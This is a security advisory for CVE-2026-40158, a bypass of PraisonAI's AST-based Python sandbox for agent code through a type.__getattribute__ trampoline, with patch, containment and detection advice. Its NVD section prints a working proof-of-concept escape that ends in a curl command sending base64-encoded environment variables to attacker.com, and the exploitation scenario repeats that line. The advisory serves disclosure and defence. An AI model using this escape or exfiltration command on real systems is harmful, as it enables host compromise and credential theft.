PraisonAI's Python execution sandbox, intended to safely run untrusted agent code, can be completely circumvented using a Python type system trampoline — a technique that transforms a blocked attribute access into an unblocked method call, requiring nothing more than the ability to submit code to the agent. Any multi-tenant platform, CI/CD pipeline, or agentic deployment that allows users to submit Python code for execution is exposed to full host compromise, including exfiltration of environment variables, API keys, and arbitrary file contents with the privileges of the host process. A public proof-of-concept demonstrates end-to-end exploitation in under fifteen lines, and with 31 prior CVEs recorded against the same package, this is part of a discernible pattern of security debt in PraisonAI's codebase that warrants elevated scrutiny. Upgrade to praisonaiagents >= 4.5.128 immediately; where patching is not immediately possible, wrap execution workers in OS-level isolation — containers with no-new-privileges, seccomp profiles, or a dedicated low-privilege user — and rotate any credentials accessible to the process environment.
Risk Assessment
High risk. CVSS 8.6 with Scope:Changed reflects the attacker's ability to pivot from the Python sandbox to the underlying host process, and Attack Complexity:Low confirms no special conditions, races, or leaked pointers are required — only the ability to submit Python code to the agent. The publicly available PoC dramatically lowers the exploitation bar to moderate skill level. Environments running PraisonAI in multi-tenant or shared contexts are at greatest risk, since a single tenant's crafted payload can reach host-level credentials and potentially pivot to adjacent infrastructure. Single-user local deployments have a narrowed attack surface but remain at risk from malicious tool inputs or notebook content.
Attack Kill Chain
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | < 4.5.128 | 4.5.128 |
| praisonaiagents | pip | — | No patch |
Severity & Risk
Attack Surface
Recommended Action
- Patch: Upgrade to praisonaiagents >= 4.5.128 immediately. Verify the patch extends AST filtering to cover string constants passed as arguments to type.__getattribute__ and similar dynamic dispatch methods — not just ast.Attribute nodes.
- Containment (if immediate patch is not possible): Run PraisonAI agent workers in isolated containers with seccomp/AppArmor profiles, read-only filesystems, no-new-privileges flags, and no access to host network or sensitive credential mounts.
- Secret rotation: Rotate any API keys, database credentials, or cloud tokens accessible to PraisonAI process environments, especially in shared or multi-tenant deployments where prior exploitation cannot be ruled out.
- Detection: Alert on outbound network connections from PraisonAI worker processes to unexpected destinations; monitor for curl, wget, or shell spawns as child processes of the agent runtime; log all code submissions for forensic review.
- Defense-in-depth: Evaluate replacing or augmenting the AST-based approach with a process-level sandbox (nsjail, gVisor, or a Wasm runtime) for any production system executing untrusted code, as AST filtering is structurally insufficient for this threat model.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-40158?
PraisonAI's Python execution sandbox, intended to safely run untrusted agent code, can be completely circumvented using a Python type system trampoline — a technique that transforms a blocked attribute access into an unblocked method call, requiring nothing more than the ability to submit code to the agent. Any multi-tenant platform, CI/CD pipeline, or agentic deployment that allows users to submit Python code for execution is exposed to full host compromise, including exfiltration of environment variables, API keys, and arbitrary file contents with the privileges of the host process. A public proof-of-concept demonstrates end-to-end exploitation in under fifteen lines, and with 31 prior CVEs recorded against the same package, this is part of a discernible pattern of security debt in PraisonAI's codebase that warrants elevated scrutiny. Upgrade to praisonaiagents >= 4.5.128 immediately; where patching is not immediately possible, wrap execution workers in OS-level isolation — containers with no-new-privileges, seccomp profiles, or a dedicated low-privilege user — and rotate any credentials accessible to the process environment.
Is CVE-2026-40158 actively exploited?
No confirmed active exploitation of CVE-2026-40158 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-40158?
1. Patch: Upgrade to praisonaiagents >= 4.5.128 immediately. Verify the patch extends AST filtering to cover string constants passed as arguments to type.__getattribute__ and similar dynamic dispatch methods — not just ast.Attribute nodes. 2. Containment (if immediate patch is not possible): Run PraisonAI agent workers in isolated containers with seccomp/AppArmor profiles, read-only filesystems, no-new-privileges flags, and no access to host network or sensitive credential mounts. 3. Secret rotation: Rotate any API keys, database credentials, or cloud tokens accessible to PraisonAI process environments, especially in shared or multi-tenant deployments where prior exploitation cannot be ruled out. 4. Detection: Alert on outbound network connections from PraisonAI worker processes to unexpected destinations; monitor for curl, wget, or shell spawns as child processes of the agent runtime; log all code submissions for forensic review. 5. Defense-in-depth: Evaluate replacing or augmenting the AST-based approach with a process-level sandbox (nsjail, gVisor, or a Wasm runtime) for any production system executing untrusted code, as AST filtering is structurally insufficient for this threat model.
What systems are affected by CVE-2026-40158?
This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, Multi-tenant AI platforms, CI/CD pipelines with AI code execution, LLM code execution environments, Automated agentic workflows.
What is the CVSS score for CVE-2026-40158?
CVE-2026-40158 has a CVSS v3.1 base score of 8.6 (HIGH).
Technical Details
NVD Description
PraisonAI's AST-based Python sandbox can be bypassed using `type.__getattribute__` trampoline, allowing arbitrary code execution when running untrusted agent code. ## Description The `_execute_code_direct` function in `praisonaiagents/tools/python_tools.py` uses AST filtering to block dangerous Python attributes like `__subclasses__`, `__globals__`, and `__bases__`. However, the filter only checks `ast.Attribute` nodes, allowing bypass via: The sandbox relies on AST-based filtering of attribute access but fails to account for dynamic attribute resolution via built-in methods such as type.__getattribute__, resulting in incomplete enforcement of security restrictions. ```python type.__getattribute__(obj, '__subclasses__') # Bypasses filter ``` The string `'__subclasses__'` is an `ast.Constant`, not an `ast.Attribute`, so it is never checked against the blocked list. ## Proof of Concept ```python # This code bypasses the sandbox and achieves RCE t = type int_cls = t(1) # Bypass blocked __bases__ via type.__getattribute__ bases = t.__getattribute__(int_cls, '__bases__') obj_cls = bases[0] # Bypass blocked __subclasses__ subclasses_fn = t.__getattribute__(obj_cls, '__subclasses__') all_subclasses = subclasses_fn() # Find _wrap_close class for c in all_subclasses: if t.__getattribute__(c, '__name__') == '_wrap_close': # Get __init__.__globals__ via bypass init = t.__getattribute__(c, '__init__') glb = type(init).__getattribute__(init, '__globals__') # Get system function and execute system = glb['system'] system('curl https://attacker.com/steal --data "$(env | base64)"') ``` --- ## Impact This vulnerability allows attackers to escape the intended Python sandbox and execute arbitrary code with the privileges of the host process. An attacker can: * Access sensitive data such as environment variables, API keys, and local files * Execute arbitrary system commands * Modify or delete files on the system In environments that execute untrusted code (e.g., multi-tenant agent platforms, CI/CD pipelines, or shared systems), this can lead to full system compromise, data exfiltration, and potential lateral movement within the infrastructure. --- ## Affected Code ```python # praisonaiagents/tools/python_tools.py (approximate) def _execute_code_direct(code, ...): tree = ast.parse(code) for node in ast.walk(tree): # Only checks ast.Attribute nodes if isinstance(node, ast.Attribute) and node.attr in blocked_attrs: raise SecurityError(...) # Bypass: string arguments are not checked exec(compiled, safe_globals) ``` **Reporter:** Lakshmikanthan K (letchupkt)
Exploitation Scenario
An attacker targeting a SaaS platform built on PraisonAI submits a seemingly functional data-processing script as part of normal platform usage. The script uses type.__getattribute__ to traverse the Python class hierarchy — bypassing the AST filter's blocked-attribute list, because the dangerous attribute names are passed as string constants rather than attribute nodes — to reach _wrap_close.__init__.__globals__, which contains a live reference to the os.system function. The attacker calls system('curl https://attacker.com/exfil --data "$(env | base64)"'), exfiltrating all environment variables including cloud provider credentials, database connection strings, and third-party API keys in a single HTTP request. With those credentials, the attacker moves laterally to the cloud control plane or adjacent databases, escalating from a single code submission to a full infrastructure breach affecting every tenant on the platform.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2026-39890 9.8 PraisonAI: YAML deserialization enables unauthenticated RCE
Same package: praisonai GHSA-vc46-vw85-3wvm 9.8 PraisonAI: RCE via malicious workflow YAML execution
Same package: praisonai GHSA-2763-cj5r-c79m 9.7 PraisonAI: RCE via shell injection in agent workflows
Same package: praisonai CVE-2026-40154 9.3 PraisonAI: supply chain RCE via unverified template exec
Same package: praisonai GHSA-8x8f-54wf-vv92 9.1 PraisonAI: auth bypass enables browser session hijack
Same package: praisonai
AI Threat Alert